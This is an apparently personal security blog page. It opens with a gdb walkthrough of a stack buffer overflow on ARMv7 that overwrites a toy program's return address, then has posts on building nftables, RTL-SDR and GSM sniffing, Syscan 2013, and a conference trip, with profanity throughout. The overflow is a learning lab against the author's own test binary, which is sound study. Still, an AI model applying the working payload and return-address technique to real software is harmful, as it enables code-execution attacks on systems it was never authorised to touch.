Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
   0x00008448 <+0>:    push    {r7, lr}
   0x0000844a <+2>:    sub    sp, #8
   0x0000844c <+4>:    add    r7, sp, #0
   0x0000844e <+6>:    str    r0, [r7, #4]
   0x00008450 <+8>:    str    r1, [r7, #0]
   0x00008452 <+10>:    movw    r3, #34040    ; 0x84f8
   0x00008456 <+14>:    movt    r3, #0
   0x0000845a <+18>:    mov    r0, r3
   0x0000845c <+20>:    movw    r1, #33797    ; 0x8405
   0x00008460 <+24>:    movt    r1, #0
   0x00008464 <+28>:    movw    r2, #33845    ; 0x8435
   0x00008468 <+32>:    movt    r2, #0
   0x0000846c <+36>:    blx    0x8340
   0x00008470 <+40>:    ldr    r3, [r7, #0]
   0x00008472 <+42>:    add.w    r3, r3, #4
   0x00008476 <+46>:    ldr    r3, [r3, #0]
   0x00008478 <+48>:    mov    r0, r3
   0x0000847a <+50>:    bl    0x8404
   0x0000847e <+54>:    mov.w    r3, #0    ==> 0x0000847e should be the return address of test()
   0x00008482 <+58>:    mov    r0, r3
   0x00008484 <+60>:    add.w    r7, r7, #8
   0x00008488 <+64>:    mov    sp, r7
   0x0000848a <+66>:    pop    {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
   0x00008434 <+0>:    push    {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
   0x00008436 <+2>:    add    r7, sp, #0
   0x00008438 <+4>:    movw    r0, #34024    ; 0x84e8
   0x0000843c <+8>:    movt    r0, #0
   0x00008440 <+12>:    blx    0x8358
   0x00008444 <+16>:    pop    {r7, pc}
End of assembler dump.

Let's check the memory layout:

(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435

Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11      strcpy(buf, input);
(gdb) n
12      printf("%s \n", buf);
(gdb)
AAAABBBB
13    }
(gdb) x/12x $sp
0x7efff658:    0x00000000    0x7efff919    0x000084f8    0x41414141
0x7efff668:    0x42424242    0x00008400    0x7efff678    0x0000847f==> ret addr of test()
0x7efff678:    0x7efff7d4    0x00000002    0x00000000    0x76f12cfb

So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]

Why the hell did the address 0x0000847e we saw above become 0x0000847f? Weird...Anyone know what happened?

OK, let's try our first exploit:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A' <repeats 16 times>, "4\204") at victim.c:11
11      strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�

Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17      printf("being hacked\n");
(gdb) n

Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.

Did you see this? Add 1 to fuck_me()'s address, plz.....

(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435

Breakpoint 1, test (input=0x7efff90f 'A' <repeats 16 times>, "5\204") at victim.c:11
11      strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked

Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=) at victim.c:13
13    }

It worked! So the exploit should be:
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault

===========================

I guess exploitation on ARM is much different from x86. I've heard that ret2libc won't work on ARM. That's really interesting and worth figuring out. Obviously, this Phrack paper and some manuals should be added to my must-read list.

Wednesday, October 23, 2013

Say "hello nftables" on Debian 7 GNU/Linux

Nftables is the 4th generation packet filter engine for the linux kernel and it will be merged into kernel 3.13. I haven't played with netfilter for a while. When I saw nftables a couple of days ago, I felt there was something (an itch?) I needed to scratch;-) Let's try to say "Hi" to nftables.

OS: Debian 7 GNU/Linux. Grab the small version of the iso here.

After the installation, some packages need to be installed as well:
#apt-get install git vim libgmp-dev libreadline-dev libtool autoconf gcc make pkg-config libjansson-dev libmxml-dev flex bison libncurses5-dev kernel-package

First, you need to compile two libraries: libmnl and libnftables
git clone git://git.netfilter.org/libmnl
cd libmnl/
./autogen.sh
./configure
make
sudo make install
sudo ldconfig

git clone git://git.netfilter.org/libnftables
cd libnftables/
./autogen.sh
./configure --with-json-parsing --with-xml-parsing
make
sudo make install
sudo ldconfig

Then, compile/install the userspace tool( nft):

git clone git://git.netfilter.org/nftables
cd nftables
./autogen.sh
ac_cv_func_malloc_0_nonnull=yes ac_cv_func_realloc_0_nonnull=yes  ./configure
make
sudo make install
sudo ldconfig

Well, because linux-3.13 isn't released yet, we need to grab the source code from the nftables dev tree:

git clone git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nftables.git linux
cp /boot/config-3.2.0-4-686-pae .config
make menuconfig( select these NF_TABLES options)
make -j 3 deb-pkg
cd ../
sudo dpkg -i *.deb

Reboot your machine. Let's try some policies. Thanks to the author, whoever wrote this HOWTO. Nftables policy seems easy to write. But I'm still not used to the new style, since I don't even know how to delete a table. It always says the device is BUSY or something like that. WTH~ I checked the commits; it should be a feature though. I think a policy converter tool between iptables and nftables is necessary. Otherwise, it'd be a barrier to those old school iptables users/admins/developers.

Thursday, October 17, 2013

RTL-SDR version of "Hello World"

Telco sec has always been a fascinating field I want to get involved with. Why? Because those old school Phrack guys played with both computer sec and telco sec. I missed the golden age of Phrack, which bothered me for a while. It won't stop me from diving into any field I want now. If what makes you tick is only profit (money?), come on, you probably aren't qualified to mention the term "underground spirit";-)

About a month ago, a friend (can't list his/her name here-_-) sent me a slide deck about femtocell hacking and asked if I might be interested in it. Of course I was. But...well, there's always a fucking "but", isn't there?...a femtocell is a little bit expensive and I was busy with other stuff at the time. Then I even forgot this shit until a great hacker (can't list his/her name either-_-) mentioned that there are cheap devices I could buy for learning telco stuff: RTL-SDR. Everything you need to know is already on this website. I bought a tuner, antenna, freq counter, SMA-MCX converter, etc... then I was catching the shit in the air. FM at first, then Mode-S transmissions and GSM sniffing. What I have learned/done in the past two weeks really shocked my mind and definitely activated a bunch of neurons in my brain. This is an awesome field. I'm willing to keep up with it in the future. Hacking on GNU/Linux system calls and the kernel is already a burden that's hard to carry. Hope I can make it this time.............I really appreciate those who were/are contributing to Phrack. It's more than a technical ezine. It's about hacking spirit and philosophical ideas.

Freq counter, it probably could be detecting IR-based controller
 Catching the shit in the air( not the wire) 
Support EFF....

Saturday, September 28, 2013

Syscan Beijing 2013 slides

I've been to 5 conferences (KCONv2, XCON2013, ISC2013, OWASP Beijing 2013, Syscan Beijing 2013) in the past months. The first four confs sucked. But Syscan brought us very high quality. Don't get me wrong. Some people think those 4 conferences are good, because they are websec guys or Windows guys. As a GNU/Linux sec guy, those conferences were drugging me to sleep;-) So, I'll only bullshit a little bit about Syscan here. Stefan Esser's presentation "Tales from iOS 6 Exploitation" shocked us;-) A lot of people thought there were many technique elements in the exploitation process and each one of them is difficult to deal with. But Stefan did them all at once. That's fuc*ing super awesome. NGUYEN Anh Quynh's presentation was about ROP gadgets. I don't know much about this field. I only used some open source ROP gadget finders once or twice. Anyway, Nguyen's talk also blew my mind on the first day of the conference, because his approach is based on the LLVM compiler (dude, you are using formal logic to deal with sec shit! Fuc*ing awesome). Plz take a look at his slides. There were other great presentations. I'll leave the slides download at the end.

Another funny story happened near the end of Jonathan's presentation. A guy asked him about FE. He just told us FE is nothing but a good advertising company. The real heroes are the grsecurity guys: they invented the concept of ASLR, and more....btw, take a look at how grsec deals with stack canaries in the hardened kernel;-)

I've packed all the slides into one tar.bz file.

Can you fucking imagine that the conference organizers (I wouldn't name you motherfuckers) brought those girls (sexy? I don't think so) there? I don't care about girls at a conference. Guys of our type would go out to the club/bar after the conference. Unfortunately, I'm already married, which means the "fuck around" part doesn't belong to me;-)



Sunday, July 28, 2013

Trip of Thessaloniki for osc 2013

As many people mentioned, openSUSE conference 2013 was held from July 18 to July 22 in Thessaloniki, Greece. After 20 hrs in the air and waiting at the airport (for a transfer), I arrived in the city of Thessaloniki at about 3:00 PM on July 17. Then I went to the seaside by bus No.78. There was a really nice view there. Then I took a taxi to the hotel for another 12 hrs of sleep;-) I visited the White Tower and Aristotle Square. The great philosopher Aristotle was born in a place near the city of Thessaloniki. I thought Aristotle had visited the city but I haven't found the related information yet.

It was really nice to be there. Local people are so relaxed. Much more relaxed than I feel in Beijing. I love this place, I do. I met many interesting guys there, including security guys and non-security guys. The people I met in Thessaloniki all love beer/sec/gaming/System of a Down/Rammstein/Nirvana/etc....even the background music in the main conference room was Nirvana songs. Man, can you believe it? I never saw that happen in China. Those guys are really awesome. I also met some sec guys there. They are very skilled and talented dudes. I think I learned not a little from them in a few days.

This trip made me feel my way back home. Most people don't like what I like in BJ. I think the whole fucking society just can't accept the type of person like me. I don't wanna change.

-------------------------------------------------------------------------
 - I love punk rock and metal, am I wrong?
 - I love Philosophy/Theology/History, am I fucking wrong?
 - I love Tri-A title computer/video games, am I fucking wrong?
 - I don't care how much money I earn( I can still feed my family, you piece of shit-_-), am I wrong? 
 - I hate the type of guys in suit who are just dead inside( walk) with their fucking boring day job, am I fucking wrong?
 ------------------------------------------------------------------------

I don't think I'm a weirdo. But most Chinese people I met in BJ just think that way. Don't get me wrong...I have some very awesome friends. They are Chinese dudes/ladies. But we are a minority....Green Day is always supporting us: "I wanna be the minority... I don't need your authority...Down with the moral majority"...aha, I really love this song;-)

btw: The food in the city of Thessaloniki is really awesome, especially the seafood. And I, as a newbie, gave a presentation "Introduction to GNU/Linux hardening" at osc 2013.

Nice view, ha?

old good port


White Tower, or maybe we should call it "The Greece Tower"



I hadn't find the ASSOS yet;-)
 Little dude, you got a gun?
 Olympic Museum, this is the place for osc2013
  Gecko money is not a bad idea, isn't it?
 Sometime, RMS is wrong. Free speech is as free beer;-)
 July 23, people are gone
 I love this shit!@#$%^&*()
 Istanbul - In the map of Civilization IV, ring the bell?
 Awesome architecture...........